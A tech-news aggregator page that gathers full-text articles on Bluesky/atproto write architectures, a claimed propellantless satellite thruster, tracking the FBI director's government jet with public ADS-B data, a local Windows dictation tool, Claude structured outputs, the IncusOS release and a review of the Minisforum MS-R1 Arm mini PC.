More from The Bitter Southerner

Show HN: Epstein Files Organized and Searchable

Hacker News
searchepsteinfiles.com
2025-11-14 19:50:16
Comments...

The politics of purely client-side apps

Lobsters
pfrazee.leaflet.pub
2025-11-14 19:49:42
Comments...
Original Article

You make a post on Bluesky. How does it happen?

Option 1:

  • Your client calls putRecord on the user's PDS

  • 200 OK, the record was created

  • The record goes through the relay to the Bluesky server

  • Bluesky servers index the new record

  • Tada

Option 2:

  • Your client calls createPost on the Bluesky servers

  • The Bluesky servers call putRecord on the user's PDS

  • The Bluesky servers update their indexes

  • 200 OK, the record was created

  • (The record shows up again via the relay and can be reindexed if needed)

  • Tada

Both of these are now possible in the Atmosphere, but which of these options is the "good one"? It turns out, that's a pretty nuanced question.

Option 1 - PDS proxies all traffic

Option 1 is the "PDS proxies all traffic" philosophy. In this model, the client logs into the PDS and then sends all traffic to the Atmosphere by proxying through the PDS.

This has some interesting consequences:

1. The client mutates records by directly writing them to the PDS

2. The PDS is able to intercept and modify traffic to apps

3. There's no opportunity for server-side computation within the lifetime of a transaction

Points 1 & 2 have positive political implications. The ability to write directly to a PDS means that third-party "pure clients" (no backend of their own) have a lot of freedom in how they operate. Then the ability to intercept and modify traffic means that a PDS can make decisions on behalf of their users which might be contrary to the application's decisions. These are both good balances against the power of an app.

Point 3 just sucks though. What's not obvious about Option 1's flow is that the time between "200 OK" and "Bluesky servers index the record" is indeterminate. The 200 OK ends the transaction from the client's perspective, so now the client is going to struggle to show the user the actions they just took.

Right now, the PDS takes advantage of traffic interception to modify getPostThread and inject the user's recent posts. That does work, but it means the PDS has Bluesky business logic baked in. Not only is that a conceptual violation of the PDS -- which is supposed to be generic -- but it's an option that's not available to every app.
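To make the Option 1 write path concrete, here is a minimal Python sketch of a pure client writing a post record straight to the user's PDS over XRPC. The host, DID, token, and record key are placeholders; a real client would get these from its OAuth session, and would typically use createRecord (which generates the record key) rather than putRecord with a hand-picked key.

# Option 1 sketch: the client writes directly to the user's PDS.
# Placeholders: PDS host, DID, access token, and record key.
import datetime
import requests

PDS_HOST = "https://pds.example.com"
REPO_DID = "did:plc:exampleuser123"
ACCESS_TOKEN = "..."  # from the client's OAuth session

record = {
    "$type": "app.bsky.feed.post",
    "text": "Hello from a pure client!",
    "createdAt": datetime.datetime.now(datetime.timezone.utc).isoformat(),
}

resp = requests.post(
    f"{PDS_HOST}/xrpc/com.atproto.repo.putRecord",
    headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
    json={
        "repo": REPO_DID,
        "collection": "app.bsky.feed.post",
        "rkey": "3kexamplerkey22",  # placeholder record key
        "record": record,
    },
)
resp.raise_for_status()  # the 200 OK ends the transaction for the client
print(resp.json())       # {"uri": ..., "cid": ...}; indexing happens later, via the relay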

Option 2 - App server speaks to PDS

Option 2 is the "App server speaks to PDS" philosophy. In this model, the client logs into the app, which in turn logs into the PDS, and then the client speaks entirely to the app. The app then writes records to the PDS directly on the user's behalf.

This basically removes all 3 of the consequences in Option 1. There's no problem of ensuring actions are immediately visible to users after a transaction, but now the client isn't in communication with the PDS so the political power of the PDS is reduced.
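For contrast, a rough sketch of Option 2 from the app server's side, assuming a hypothetical createPost handler (index_post, the host, and the credential handling are all illustrative): the server writes the record to the user's PDS, updates its own index, and only then returns, so the post is visible the moment the transaction completes.

# Option 2 sketch: a hypothetical app-server createPost handler.
# index_post and the credential handling are illustrative only.
import datetime
import requests

PDS_HOST = "https://pds.example.com"

def index_post(did: str, uri: str, cid: str, record: dict) -> None:
    """Placeholder for the app's own indexing step (e.g. a database insert)."""
    print(f"indexed {uri} ({cid}) for {did}")

def create_post(did: str, pds_token: str, text: str) -> dict:
    record = {
        "$type": "app.bsky.feed.post",
        "text": text,
        "createdAt": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    }
    # App server -> PDS: persist the canonical record in the user's repo.
    resp = requests.post(
        f"{PDS_HOST}/xrpc/com.atproto.repo.createRecord",
        headers={"Authorization": f"Bearer {pds_token}"},
        json={"repo": did, "collection": "app.bsky.feed.post", "record": record},
    )
    resp.raise_for_status()
    out = resp.json()
    # Update the app's own indexes before replying, so there is no gap
    # between "200 OK" and the post showing up for the user.
    index_post(did, out["uri"], out["cid"], record)
    return out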

Which should we do here?

Ultimately, the Atmosphere community is going to need to align on one of these two methods. The Bluesky app still uses Option 1, but now that OAuth is here the guidance we've been giving is Option 2. Is that the right call?

I'm really torn on this. I'm going to just dump an assortment of thoughts, some of which are contradictory.

  • Purely client-side apps are a good thing

  • It sucks when you're building purely client-side and can't do exactly what you want to do, or can't make your customizations perform well

  • Services like microcosm are pretty great for enabling those customizations

  • Option 2 is much more intuitive to me than Option 1

  • Option 2 will always perform better

  • It's currently too expensive to build full network app servers in the Atmosphere

  • The ability for the PDS to intercept and modify traffic is really good

  • The role of the PDS within the political economy of the atmosphere is still not totally clear, but acting as some kind of counterbalance to applications is a really promising idea if we could get more clarity on how that will work

My gut says we should be leaning towards Option 2 because it's clearer and because it enables app developers to do more. To handle the costs, I'm inclined to think that Bluesky's servers should be available almost like a cloud service, which would drive down costs a lot and generally increase the ability for third-party apps to implement new or different behaviors. This would essentially transfer the political power of the PDS (i.e., to intercept and modify traffic) over to the third-party applications.

Just some thoughts.

An Italian Company Builds the First Known Propellantless Space-Propulsion System

Hacker News
www.satcom.digital
2025-11-14 19:43:15
Comments...
Original Article

Genergo, an Italian deep-tech company based in Como, comes out of stealth and unveils an innovative electromagnetic space-propulsion system that uses no propellant, successfully flight-tested and validated across three space missions and protected by a portfolio of granted international patents.

Operational satellites equipped with propulsion carry propellant on board to perform orbital maneuvers, maintain position, and, in some cases, execute end-of-life atmospheric re-entry. Propellant takes up volume and adds mass - often further increased by the hardware required to manage it (pressurized tanks, control valves, feed lines) - introduces operational risks (leaks, explosions), and is, by definition, a finite resource. Once depleted, the spacecraft is no longer maneuverable and the mission ends.

Genergo’s system generates thrust without using any propellant and without expelling reaction mass, by directly converting electrical energy into thrust through controlled electromagnetic impulses. To the company’s knowledge, it is the first space-propulsion system worldwide capable of operating without propellant, flight-tested and validated on orbit, and it represents a clear discontinuity from current standards. By design, the technology is scalable and operates with a modest power requirement.

The system also exhibits a highly sustainable profile: it uses no hazardous or toxic materials, requires no pressurized components to be stored on board, and introduces no risk of contaminating the space environment—either during operations or upon atmospheric re-entry.

After passing, on the first attempt and within a few months, all mission launch-qualification tests to the industry’s most stringent standards, the technology accumulated more than 700 hours of on-orbit operation across three missions launched between 2022 and 2023. The missions—still operational—were launched on SpaceX Falcon 9 as part of the Transporter rideshare campaigns (Transporter-5, -6 and -9) and hosted on D-Orbit’s ION Satellite Carrier spacecraft (platforms designed by the Italian company based in Fino Mornasco, Como, also used to carry and qualify emerging technologies in space). Over the past two years, multiple on-orbit activation cycles have continued alongside data analysis and characterization activities; additional tests are planned to further characterize the technology.

The campaigns confirmed system functionality in real space conditions, bringing the technology to a maturity level equivalent to TRL 7–8 (Technology Readiness Level). As additional confirmation of the results, several long-duration tests were conducted in which it was observed, objectively and repeatedly, that motor activation produced a measurable acceleration or deceleration of the host spacecraft.

The performance achieved to date by the flight-tested prototypes is already aligned with market requirements for specific mission profiles.

Several Italian organizations contributed to the project, including:

  • The Department of Electronics, Information and Bioengineering (DEIB) at Politecnico di Milano, for laboratory bench measurements;

  • The Department of Aerospace Science and Technology (DAER) at Politecnico di Milano, which developed the spacecraft dynamics model for the on-orbit analysis of the first mission and produced the motor electromagnetic-emissions report required during preliminary qualification for on-orbit acceptance;

  • An independent company specializing in high-technology solutions, which validated the in-orbit results using a broad set of methodological approaches, ensuring the robustness and repeatability of the observed performance.

Genergo’s technology opens new perspectives for space missions.

In addition to further on-orbit campaigns planned for continued development, the first commercial application will be controlled deorbit—namely, lowering a satellite’s orbit to guide atmospheric re-entry and ensure burn-up at the end of the mission.

How to Track Kash Patel’s Jet

Intercept
theintercept.com
2025-11-14 19:29:25
Flight-tracking is a powerful tool for government transparency. We’ll show you how to do it. The post How to Track Kash Patel’s Jet appeared first on The Intercept....
Original Article

FBI Director Kash Patel enjoys access to a litany of professional perks, among them use of a Gulfstream G550 jet, a 15-passenger luxury aircraft owned by the Department of Justice that he has reportedly taken to visit his aspiring country musician girlfriend. Responding to growing outrage about his personal use of the government jet, Patel has insisted those who track his flights are dangerous and cowardly.

Unfortunately for Patel, tracking flights is legal, easy, and an important tool of government transparency.

The location of aircraft within and around the United States is public because the law requires it to be: The Federal Aviation Administration mandates that aircraft must be trackable for safety reasons, namely, to prevent them from crashing into each other all the time. Aircraft, whether privately owned or operating for a major carrier, from a small prop plane to a jumbo jet, are generally required by law to carry a radio transmitter, called a transponder, that continuously broadcasts its GPS coordinates and other information, such as altitude and ground speed. Thanks to what’s known as the Automatic Dependent Surveillance–Broadcast, or ADS-B, unencrypted transponder signals are received by other planes in the sky and anyone with a compatible antenna on the ground. According to the FAA, “ADS-B improves safety and efficiency in the air and on runways, reduces costs, and lessens harmful effects on the environment.”

Accessing these broadcast coordinates from the ground is only slightly more complex than tuning in to a local radio station. Entire online communities of aircraft hobbyists, researchers, journalists, and others make use of this open source data to chart the travel of foreign dignitaries, military movements, corporate executive trips, and, now, the director of the FBI.

Because private jets are vessels of the rich and powerful, the ability to track them provides undeniable value to the public: It’s been used to monitor Russian oligarchs, map the CIA’s foreign torture program, and calculate Taylor Swift’s carbon footprint. That this tracking is entirely legal hasn’t stopped the owners of private jets from objecting to the practice. Elon Musk notoriously threatened legal action and banned users from his “free speech” platform X for revealing the movements of his private jet, a practice he described as tantamount to sharing “assassination coordinates.” The use of luxury planes by public servants is a perennial political issue too. In January 2023, two years before he was named as Wray’s successor, Patel blasted FBI Director Christopher Wray’s use of the “tax payer funded private jet” based on exactly this same public tracking data.

Patel’s attitude has changed now that he enjoys free use of that jet. In October, Patel’s jet was monitored flying to State College Regional Airport in Pennsylvania, a brief drive to an arena on the Penn State campus where he and girlfriend Alexis Wilkins were photographed at a Real American Freestyle pro-wrestling event at which Wilkins had performed a song. Flight data then showed the jet heading later that evening to Nashville, where Wilkins lives, according to her personal website. After facing criticism for using a government plane to see his girlfriend sing the national anthem at a local wrestling event, Patel quickly lashed out in an X post, attacking public scrutiny of the flights and claiming the use of such data is “cowardly and jeopardizes our safety.”

As FBI director, Patel is required by federal policy to use the jet for personal trips, but Patel is also required to reimburse the DOJ for personal flights. The FBI did not respond to a request for comment or questions posed by The Intercept, including whether Patel has reimbursed the DOJ for personal jet use.

Plane-tracking websites usually draw data from several sources, with many relying heavily on information straight from the FAA. Jet owners can ask the FAA to exclude their transponder data from public trackers, a request many commercial services will honor. For this reason, many plane-watching enthusiasts favor ADS-B Exchange , a free website that crowdsources transponder data collected by thousands of volunteers on the ground and pools it for public consumption. Because it uses crowdsourcing instead of just official FAA data, ADS-B Exchange shows every flight its connected antennae pick up — even if the aircraft’s owners have requested to be delisted. (Although it’s the most comprehensive, certain flights, like military planes that broadcast encrypted coordinates, can remain undetected even by ADS-B Exchange.)

Software engineer and plane tracking enthusiast John Wiseman recommended ADS-B Exchange and Airplanes.live , another service. “They don’t use FAA data, so they’re not bound by FAA rules on what data can be distributed. They also don’t take requests from aircraft owners to anonymize flights,” Wiseman explained.

ADS-B Exchange, with its sprawling, comprehensive map of nearly every plane in the sky, can be overwhelming at first. But tracking Patel’s jet (or any aircraft) is simple. Last year Congress made it more difficult for the public to connect private jets to their owners; establishing the ownership of non-governmental planes can sometimes require serious digging. But the existence of the FBI jet is a matter of public record, and its registration information is publicly available from the FAA’s website. Each plane in the FAA’s system has a unique number: Patel’s is N708JH. The FAA website confirms that N708JH is owned by an entity at 935 Pennsylvania Avenue in Washington, DC, the address of FBI headquarters. Searching ADS-B Exchange for N708JH will immediately pull up the plane’s current position, if in the air, as well as historical records of past flights. At the time of publication, the jet was last clocked landing at a municipal airport outside of Washington.

Pressing the “Play” button on ADS-B Exchange’s interface will animate a selected historical flight route. It’s possible to dive deeper into the data using filters; appending “?mil=1” at the end of the site’s URL will show only available military flights, for example.

Anyone can search the FAA website to find other planes of interest; a search for the word “department” reveals dozens of aircraft registered to various federal offices. The website Planespotters.net collects runway photography from around the world, including of N708JH , and can be used to find other aircraft belonging to the Justice Department or other government entities. With a tail number in hand plucked either from FAA or another source, it’s not hard to figure out a plane’s location and travel history.

There are limits to what flight data can reveal. Nothing about the purpose of a flight is disclosed, nor are its passengers. But in conjunction with other open-source information — Wilkins’s Instagram account placed Patel alongside her at Real American Freestyle — it can help fill in the gaps.

The Wall Street Journal used flight data from the plane-tracking service FlightRadar24 in a recent report showing that the FBI jet not only traveled to Nashville coinciding with Wilkins’s wrestling performance, but shortly thereafter also ferried Patel to the Boondoggle Ranch, a Texas hunting resort.

But if the U.S. government, particularly the military, wants to keep a flight hidden badly enough, it will. As the Pentagon launched a string of airstrikes against Iran in June, flight-tracking enthusiasts across the internet latched onto an Air Force refueling plane heading west, toward a base that houses B-2 bombers. Meanwhile, the actual B-2 bombers involved in the strike — which didn’t appear on any tracking portals — were flying in the opposite direction.

Savvy flight-watchers can sometimes get lucky, though, Wiseman explained. ADS-B Exchange also picks up planes broadcasting TIS-B signals, another transponder system. “Many law enforcement and military aircraft only show up on TIS-B. The icons are distinctive, and the [ID codes] are prefixed with ‘~’,” he said. “Sometimes people think those are drones, or fighter jets. They’re almost always just police aircraft, but once in a while, rarely, they are drones or fighter jets.”

Experts suggest new plane trackers chat with other enthusiasts who can share helpful knowledge and context. Discords or other online communities of plane-watchers can help newcomers avoid common errors, like mistaking what might be a typical flight pattern for something unusual or suspect.

Despite Patel’s characterization of plane scrutiny as the work of “clickbait haters” and “uninformed internet anarchists,” plane trackers who spoke to The Intercept all firmly defended the public’s right to know. “Public officials are acting in our name, so we should actively be making sure they’re doing what they claim to be doing and doing so ethically,” Canadian researcher Steffan Watkins, an avid tracker of military and other governmental flights, told The Intercept.

“There’s a strong public interest in knowing how aircraft are being used, and keeping government organizations accountable,” said Wiseman. “It’s good for the public, journalists, and researchers to be able to see how these aircraft are being used, in detail, and how public funds are being spent, in detail. Transparency also deters misuse.”

Wiseman recounted how flight tracking techniques have been used to reveal governmental aerial surveillance of protests : “If it hadn’t been for the persistence of a bunch of nerds obsessed with planes it’s possible the public would have never known.”

Even the DOJ itself has been a fan of ADS-B tracking. In 2016, Assistant Attorney General Leslie Caldwell said her office had used Dictator Alert, a plane-tracking website that uses ADS-B Exchange data, to aid in criminal seizure investigations.

Watkins rejected concerns — raised largely by the jet-owning class — that using ADS-B data presents a security risk: “Adversaries, like China, Russia, Iran, etc. already have better ways [and] larger numbers of intelligence professionals tracking these movements, so the public should be as informed as public sources allow.” Wiseman agreed, saying, “There seems to be almost no risk to legitimate operations by making this information public, based on the fact that over the past years that ADS-B has been in wide use and registration information has been generally public we’ve seen very few if any incidents.”

Show HN: Chirp – Local Windows dictation with ParakeetV3 no executable required

Hacker News
github.com
2025-11-14 19:07:45
Comments...
Original Article

Chirp

Chirp is a Windows dictation app that runs fully locally using ParakeetV3 STT and is managed end-to-end with uv. Chirp does not require the ability to run executable files (like .exe) on Windows. It was designed so that if you're allowed to run Python on your machine, you can run Chirp.

Why ParakeetV3?

ParakeetV3's accuracy is indistinguishable from Whisper-large-V3's (multilingual WER 4.91 vs 5.05), but it is 17x faster and only requires a CPU, while Whisper models of comparable accuracy require GPUs.

https://huggingface.co/spaces/hf-audio/open_asr_leaderboard

Goals

  • Provide fast, reliable, local-first dictation on Windows.
  • GPU not needed or wanted.
  • Corporate environment friendly - NO NEW EXECUTABLES (.exe) REQUIRED. If you can run python you can run chirp.

Features

  • Local STT via Parakeet TDT 0.6B v3 with optional int8 quantization.
  • Global hotkey to toggle capture, clipboard paste injection, and configurable word overrides.
  • Optional audio feedback cues and style prompting for post-processed text.
  • CPU support by default with optional GPU providers when available.

Architecture

  • src/chirp/main.py — CLI entrypoint and application loop.
  • src/chirp/config_manager.py — configuration loading and Windows-specific paths.
  • src/chirp/parakeet_manager.py — Parakeet backend integration and provider handling.
  • src/chirp/setup.py — one-time setup routine that prepares local model assets.

Setup (Windows, uv-only)

  1. Clone the repository and enter it:
    git clone https://github.com/Whamp/chirp.git
    cd chirp
  2. Run the one-time setup (downloads the model):
    uv run python -m chirp.setup

Running

  • Daily usage (preferred, works even on systems that block .exe launchers):
    uv run python -m chirp.main
  • Verbose/debug logging:
    uv run python -m chirp.main -- --verbose
  • CLI help and options:
    uv run python -m chirp.main -- --help

Customization

  • The config.toml has sensible defaults but is fully customizable.
  • config.toml also allows for word_overrides, which map misrecognized phrases to replacements, e.g. "parra keet" -> "parakeet" (a runtime sketch follows the listing below). Annotated config.toml:
primary_shortcut = "ctrl+shift"                 # Hotkey that toggles recording; any combination supported by the `keyboard` library works (e.g. "ctrl+shift+space").
stt_backend = "parakeet"                        # Only "parakeet" is bundled today, but keeping this key lets us add more backends later if needed.
parakeet_model = "nemo-parakeet-tdt-0.6b-v3"    # Deployed ONNX bundle name; keep as-is unless new models are added.
parakeet_quantization = ""                      # Set to "int8" to download/use the quantized model variant; leave blank for default fp16.
onnx_providers = "cpu"                          # ONNX runtime provider string (comma- or pipe-separated if your build supports multiple providers, e.g. "cuda" or "cpu|dml").
threads = 0                                     # 0 (or empty) lets ONNX decide; set a positive integer to pin thread usage.
language = "en"                                 # Optional ISO language code; leave blank to let Parakeet auto-detect.
post_processing = ""                            # Text prompt for the StyleGuide; see docs/post_processing_style_guide.md (e.g. "sentence case", "prepend: >>", "append: — dictated with Chirp").
paste_mode = "ctrl"                             # Non-Windows platforms honor this: "ctrl" -> Ctrl+V, "ctrl+shift" -> Ctrl+Shift+V. Windows types text directly today.
clipboard_behavior = true                       # Keeps clipboard history clean when true by clearing it after `clipboard_clear_delay` seconds.
clipboard_clear_delay = 0.75                    # Seconds to wait before clearing the clipboard (only if `clipboard_behavior` is true).
audio_feedback = true                           # Enables start/stop chime playback.
start_sound_path = ""                           # Leave blank to use bundled asset; default: src/chirp/assets/ping-up.wav
stop_sound_path = ""                            # Leave blank to use bundled asset; default: src/chirp/assets/ping-down.wav

# Word overrides map spoken tokens (case-insensitive) to replacement text.
[word_overrides]
parrakeat = "parakeet"
"parra keat" = "parakeet"  

Removal

  • Delete the cloned chirp directory.
  • That's it.

Acknowledgments

Structured Outputs on the Claude Developer Platform (API)

Hacker News
www.claude.com
2025-11-14 19:04:23
Comments...
Original Article


Guarantee responses match your JSON schemas and tool definitions with structured outputs.

The Claude Developer Platform now supports structured outputs for Claude Sonnet 4.5 and Opus 4.1. Available in public beta, this feature ensures API responses always match your specified JSON schemas or tool definitions.

With structured outputs, developers can eliminate schema-related parsing errors and failed tool calls by ensuring that Claude's responses conform to a defined schema—whether you're extracting data from images, orchestrating agents, or integrating with external APIs.

Building reliable applications

For developers building applications and agents in production, a single error in data formatting can cause cascading failures. Structured outputs solves this by guaranteeing your response matches the exact structure you define, without any impact to model performance. This makes Claude dependable for applications and agents where accuracy is critical, including:

  • Data extraction when downstream systems rely on error-free, consistent formats.
  • Multi-agent architectures where consistent communication between agents is critical for a performant, stable experience.
  • Complex search tools where multiple search fields must be filled in accurately and conform to specific patterns.

Structured outputs can be used two ways: with JSON or tools. When used with JSON, you provide your schema definition in the API request. For tools, you define your tool specifications, and Claude's output conforms to those tool definitions automatically.
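As a rough sketch of the tool-based path using the Python SDK (the model id, tool name, and schema below are illustrative, and the exact beta opt-in for structured outputs is described in Anthropic's documentation):

# Illustrative sketch: constrain Claude's output with a tool's input_schema.
# The model id, tool, and schema are examples; see Anthropic's docs for the
# structured-outputs beta specifics.
import anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

invoice_tool = {
    "name": "record_invoice",
    "description": "Record an invoice extracted from free-form text.",
    "input_schema": {
        "type": "object",
        "properties": {
            "vendor": {"type": "string"},
            "total": {"type": "number"},
            "currency": {"type": "string", "pattern": "^[A-Z]{3}$"},
        },
        "required": ["vendor", "total", "currency"],
    },
}

message = client.messages.create(
    model="claude-sonnet-4-5",  # example model id
    max_tokens=1024,
    tools=[invoice_tool],
    tool_choice={"type": "tool", "name": "record_invoice"},
    messages=[{"role": "user", "content": "Acme Corp billed us $1,250.00 USD for consulting."}],
)

# With structured outputs enabled, the tool call's input conforms to
# input_schema, so it can feed downstream systems without defensive parsing.
tool_use = next(block for block in message.content if block.type == "tool_use")
print(tool_use.input)  # e.g. {"vendor": "Acme Corp", "total": 1250.0, "currency": "USD"}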

The end result is a reliable output, reduced retries, and a simplified codebase that no longer needs failover logic or complex error handling.

Customer Spotlight: OpenRouter

OpenRouter provides 4M+ developers access to all major AI models through a single, unified interface.

"Structured outputs have become a really valuable part of the agentic AI stack. Agents constantly ingest and produce structured data, so Anthropic’s structured outputs close a real gap for developers. Agent workflows run reliably, every time, and teams can focus on their customers rather than debugging tool calls,” said Chris Clark, COO, OpenRouter.

Getting started

Structured outputs is now available in public beta for Sonnet 4.5 and Opus 4.1 on the Claude Developer Platform, with support for Haiku 4.5 coming soon. Explore our documentation for supported JSON schema types, implementation examples, and best practices.

Announcing IncusOS

Lobsters
discuss.linuxcontainers.org
2025-11-14 19:03:18
Comments...
Original Article

Introduction

After a bit over a year of hard work, the development team is very excited to announce general availability of IncusOS!

IncusOS is a modern immutable OS image that’s specifically designed to run Incus.
It provides atomic updates through an A/B update mechanism using distinct partitions and it enforces boot security through UEFI Secure Boot and a TPM 2.0 module.

Under the hood, it’s built on a minimal Debian 13 base, using the Zabbly builds of the Linux kernel, ZFS, and Incus, providing the latest stable versions of all of those. We rely heavily on systemd tooling to handle image builds (mkosi), application installation (sysext), system updates (sysupdate), and a variety of other things from network configuration to partitioning.

It’s a very locked down environment where no local or remote shell access is provided. The entire system is configured and operated through the Incus API, using either TLS client certificate authentication or external OIDC authentication.

An introduction video can be found here:

Website: Linux Containers - IncusOS - Introduction
Documentation: IncusOS documentation
Github: GitHub - lxc/incus-os: Immutable Linux OS to run Incus

How to try it

IncusOS is designed to run on bare metal, mostly on modern servers from the past 5 years or so. But it can also run on older hardware, so long as it meets our minimum requirements, or in a virtual machine, mostly for testing purposes.

We’ve published detailed instructions for a variety of environments here:

Downloading IncusOS is most easily done through our online image customizer which allows for selecting the desired image and behavior as well as providing the public certificate to be trusted upon installation.

A custom image is required as there is no interactive installation process at all. Everything needed for installation and initial startup is defined through built-in configuration (referred to as seed), which gets applied to the system on first boot.

Additionally, all Incus online demo sessions have been using IncusOS for the past 3-4 months now.

What’s next

Now that IncusOS is considered stable, we will be producing at least one stable build a week to pick up the latest Linux kernel bugfix release and any other Incus or Debian bug fixes.

We also still have quite a few features and improvements to make to IncusOS; these range from adding a few more configuration options to supporting Linstor (alongside the existing Ceph support) and more system services like Netbird (alongside our existing Tailscale support).

On the more exciting front, we’re working on a couple of changes to both IncusOS and the Incus UI to allow full deployment and management entirely through the web interface, also eliminating the need for TLS client certificate authentication:

Once that’s all sorted out, we’ll focus on supporting an automated deployment of the full Incus stack including all recommended support services (authentication, authorization, monitoring, distributed networking, distributed storage, …).

How can you help

At this point, we’d love for as many as possible to give IncusOS a try, both in a virtualized test environment and on any spare physical hardware you may have.

Just keep the Secure Boot and TPM 2.0 requirements in mind. A general rule of thumb is that any piece of hardware capable of running Windows 11 will also be capable of running IncusOS.

We have opened a new forum category for questions and discussions around IncusOS:

Bugs and feature requests can be filed directly on Github:

Minisforum Stuffs Entire Arm Homelab in the MS-R1

Hacker News
www.jeffgeerling.com
2025-11-14 18:42:55
Comments...
Original Article

Minisforum MS-R1 front

The Minisforum MS-R1 uses the same Cix CD8180 Arm SoC as the Orion O6 I reviewed earlier this year . But everything else about this thing is different.

What this thing should be, is a box that runs Linux and can compete with at least an Apple M1 Mac mini, or a mid-range Mini PC. But what we got ... is something different.

Video

Hate reading? I also published a video on the MS-R1 on my YouTube channel. Watch it here, or scroll on past.

Hardware overview

Let's get started with the hardware. At first glance, it looks great!

Minisforum MS-R1 open chassis rear ports

You have a 12 core Arm CPU with a Mali G720 iGPU. There's a full-size PCIe slot, NVMe storage, WiFi 6E, and a ton of ports on the front and back.

You have a grand total of 9 USB ports, with 2 of them Type C with DisplayPort 1.4.

There's HDMI, dual 10 Gbps NICs (Realtek RTL8127), and even an old fashioned audio combo jack, so you can plug in a headset.

It looks great on my desk, it's quiet, it uses a 19V 180W power adapter (which is a bit chunky, but par for the course with Minisforum PCs), and overall, the hardware is some of the nicest of any Arm system, outside Apple's walled garden.

And the way you get inside is simple: press a little button and slide the chassis out of the shell (see photo above).

Minisforum MS-R1 U.2 adapter in WiFi card slot

It came with adapters for a U.2 drive (see above) or a second M.2 drive, which replace the built-in Mediatek WiFi card.

And yes, the unit I'm testing is a review unit sent by Minisforum. They did not pay me to test the machine, write this blog post, nor did they have any input into its contents.

Cix SoC - iGPU and a Big/Medium/Little Arm CPU

Now, let's dive into why this machine puzzles me, starting with the iGPU. Using Minisforum's default Debian 12 install, I could run glmark2 , and it performed well, scoring 6322, far above something like a Raspberry Pi 5 (which got 1935).

But Vulkan support was iffy: vulkaninfo segfaulted, and vkmark wouldn't run at all.

But GravityMark did. And while the G720 won't bring home any awards, it's about on par with the Adreno 750 in Qualcomm's Snapdragon 8cx Gen 3.

That's the chip Microsoft used in their 'Project Volterra' 2023 Windows Arm Dev Kit.

And that's not the only similarity between the two.

Geekbench 6 scores were also pretty close, coming in at 1336 single core and 6773 multicore.

Minisforum Geekbench 6 Arm benchmark MS-R1

That soundly beats SBCs like the Pi 5 or a Rockchip. But it's still well under Apple's four-year-old M1.

In other benchmarks, this thing is all over the place. I have two theories about that, which I'll get to.

But in real-world use, it does feel fast. At least, faster than any Arm SBC. You can actually watch 4K video on YouTube while you do other things, which is kind-of a novelty on anything that's not Qualcomm or Apple.

More testing revealed some oddities, though.

Consider my Top500 High Performance Linpack benchmark . This is a massive CPU stress test, great for testing memory access, too.

I played around with 4 cores, 8 cores, all 12 cores , and even limited the amount of RAM I was testing, because the results I was getting were confusing.

In the end, after some help from GitHub user @volyrique , we found the Cix P1 SoC is affected by the same BLIS issue other chips like the Nvidia GB10 'Superchip' and cloud chips using Neoverse N2 CPU cores run into: Poor DGEMM performance for armsve build on Neoverse N2 .

We're diving a bit deep here, but with newer SVE technology (vs. Arm's more traditional NEON 128 bit SIMD ), chips can use arbitrary vector lengths. The BLIS library optimizes newer chips with an armsve configuration, which assumes 256+ bit vector lengths, and is not optimized at all for 128-bit vector lengths (used by the Cix P1 in the Orion O6 and Minisforum MS-R1).

All that out of the way, I have deleted the section of the video embedded above covering HPL entirely, and have updated my benchmark graphs below:

Minisforum HPL graph with other Arm systems

The MS-R1 with its 64 GB of RAM edged out my Orion O6 (I have the 16 GB model...), though it is less than half as performant as the M4 Mac mini.

Not a bad showing, overall, and after adjusting the HPL configuration to account for the instruction set mismatch, I was able to get a score almost triple that of the fastest small Arm SBCs.

Energy efficiency is a step down, though—it's not the worst, and certainly, under load, it is better than most Intel/AMD systems:

Minisforum HPL graph - efficiency

But the efficiency story is much worse considering the idle power draw:

Minisforum MS-R1 - Idle power draw

Unless you are running large workloads constantly, this machine will end up using far more energy than other Arm solutions (especially Apple's M-series Macs), due to the high idle power.

But why is it so high? This is a graph of core-to-core memory latency, showing how fast it is for different CPU cores to share memory on the system. Honestly, this isn't horrible, especially when I pair it with raw memory access speed:

Minisforum c2clat Cix SoC Arm

Minisforum MS-R1 Memory Access benchmark

The MS-R1's RAM is pretty fast (though notably slower than the O6, which directly impacts performance with tasks like AI inference).

But I think the strange CPU core layout is causing power problems; Radxa and Minisforum both told me Cix is working on power draw, and enabling features like ASPM .

It seems like for stability, and to keep memory access working core to core, with the big.medium.little CPU core layout, Cix wants to keep the chip powered up pretty high. 14 to 17 watts idle is beyond even modern Intel and AMD!

For networking, the onboard NICs provide a full 10 gigs, and the built-in WiFi 6E was good for a gigabit on my network.

And with 64 gigs of RAM, one thing this box could excel at compared to an SBC is local AI, even if it's just on the CPU.

I ran a bunch of different models that would fit in the memory, and here are those results:

Minisforum MS-R1 AI CPU benchmarks vs Arm systems

This is one place where it actually underperforms the older Orion O6 with the same CPU, which is directly related to the slower RAM speeds.

Efficiency

The performance inconsistency is puzzling, but the power consumption is really what hurts the most—that's an area where Arm is supposed to shine. But it goes to show you, CPU core architecture and even process nodes aren't everything when it comes to efficiency. Design matters.

Apple's M-series puts everything to shame, but even taking that out of the mix, it's not quite what I'd expect from 2025 Arm CPU design.

Despite all that, it's quiet and the fans keep it cool. The performance profile ramps up the fans to 100%, but that didn't make much difference in real-world performance except making it about 50 dBa from a foot away instead of 40 dBa in the normal profile.

Dedicated GPU Upgrade

If you're thinking about loading up AI models, or even modest gaming, a dedicated GPU will get you a lot further than the iGPU.

Minisforum added ventilation holes across the entire top, so a modded GPU like the Abovetop RTX A2000 , with 8 gigs of VRAM, will fit and get adequate cooling. Similar to older MS-** Minisforum workstations, this machine only fits half-height single-slot PCI Express cards, and ones that are not too long at that.

Installation is easy, though finicky due to the tight spaces. You unscrew and pull a small retention clip out, remove the slot cover, and fit the new card. It rests on a small foam spacer to isolate the card from the motherboard.

Minisforum MS-R1 rear with Nvidia RTX A2000 installed

Booting the computer back up, I saw the card using lspci, so Linux can see it. But I wasn't able to install the drivers on the Debian 12 OS image shipped with the machine. I also tried an Intel Arc A310 ECO, a lower-specced and smaller single-slot card, but that wasn't even recognized when I ran lspci.

For the Intel card, it's probably just a signaling issue, though—I'm not going to hold it against the MS-R1 since I've had issues with the A310 ECO on other systems.

BIOS detour

I'll get back to A2000 testing, but these experiments took me on a detour into the BIOS.

Minisforum MS-R1 Cix BIOS screen

There are settings for USB, RAM, power on behavior, and a lot more. It's pretty complete, but I still see a lot of things labeled 'Beta', so keep that in mind if you buy one of these things.

